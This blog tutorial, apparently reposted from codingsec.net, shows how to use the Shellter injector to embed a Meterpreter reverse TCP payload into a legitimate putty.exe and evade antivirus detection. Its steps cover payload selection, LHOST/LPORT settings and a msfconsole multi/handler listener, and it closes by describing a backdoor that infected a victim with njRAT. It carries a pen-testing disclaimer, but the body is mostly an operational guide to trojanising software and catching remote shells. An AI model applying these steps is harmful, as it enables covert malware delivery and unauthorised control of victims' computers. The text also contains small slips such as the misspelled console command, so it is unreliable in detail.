Shellter Project – bypassing Antivirus Detection
Shellter is found at the website www.shellterproject.com and is a shellcode injector. I have been using the tool to demonstrate to customers how simple it is to bypass antivirus (AV) detection using programs that would have otherwise been detected as suspicious or possible threats within typical from AV analysis engines.
Disclaimer – Our tutorials are designed to aid aspiring pen testers/security enthusiasts in learning new skills, we only recommend that you test this tutorial on a system that belongs to YOU. We do not accept responsibility for anyone who thinks it’s a good idea to try to use this to attempt to hack systems that do not belong to you
The Install
To install Shellter on Kali Linux use the following commands:
apt-get update
apt-get install shellter
apt-get update
apt-get install shellter
Time to Mess Around a Little
Next, we are going to take a legitimate program, like putty.exe, and use it for our test bed. In reality we could use literally any legitimate Windows executable.
You can easily use some slightly more advanced techniques to embed similar types of attacks in other types of files. For now let’s simply stick with Windows program executables for this example.
As you can see in the screen shot, the legitimate executable is transferred into our directory in Kali. When you play with Shellter, you will want to ensure your carrier or legitimate executable is in same directory when you run Shellter.
Now we will run Shellter:
For the sake of simplicity and expediency, we will keep to the basics for now.
Let’s select Auto for mode. We will also specify the legitimate program. Shellter will actually create a backup the legitimate executable program and modify it.
The code will be modified at this point. Shellter will give us the option to use an available payload, or we can also create a custom one. We are going to choose reverse TCP which is an existing list option:
NOTE: If you need the legitimate executable program intact after this, it is probably best to create a backup on a separate storage device prior to doing this.
You will be asked to further define some other options:
LHOST
This will be the IP address or DNS name the victim machine will use to connect back to the command and control server. The server has to be reachable by the victim.
LPORT
This will be the port used to listen in on the victim from the command and control server. In our example we used port 443.
Congratulations.
At this point you have created your new malicious program that will most likely go undetected by most antivirus programs. If you get a verified message (see below) you are basically good to go.
Now we can see that putty.exe has been modified, and Shellter created a backup of the original executable.
We will now use the md5sum command and check it against VirusTotal:
We can see VirusTotal did not have this file:
We start our listening server in msfconsole on Kali Linux
mfsconsole
use exploit/multi/handler
set LHOST 192.168.81.175
set LPORT 443
set PAYLOAD windows/meterpreter/reverse_tcp
show options
exploit
Now we will go to our victim machine where we have transferred the exploited modified version of our executable. We should have been able to bypass most antivirus systems at this point.
We will launch our exploited program which will connect back to our command and control server.
Using this method I was able to bypass many leading antivirus systems. I tried the same type of attack by taking malware from well-known existing bots. I basically created a backdoor program that would infect a victim with njRAT and connect it back to my command and control server.
Source: codingsec.net
0 comments: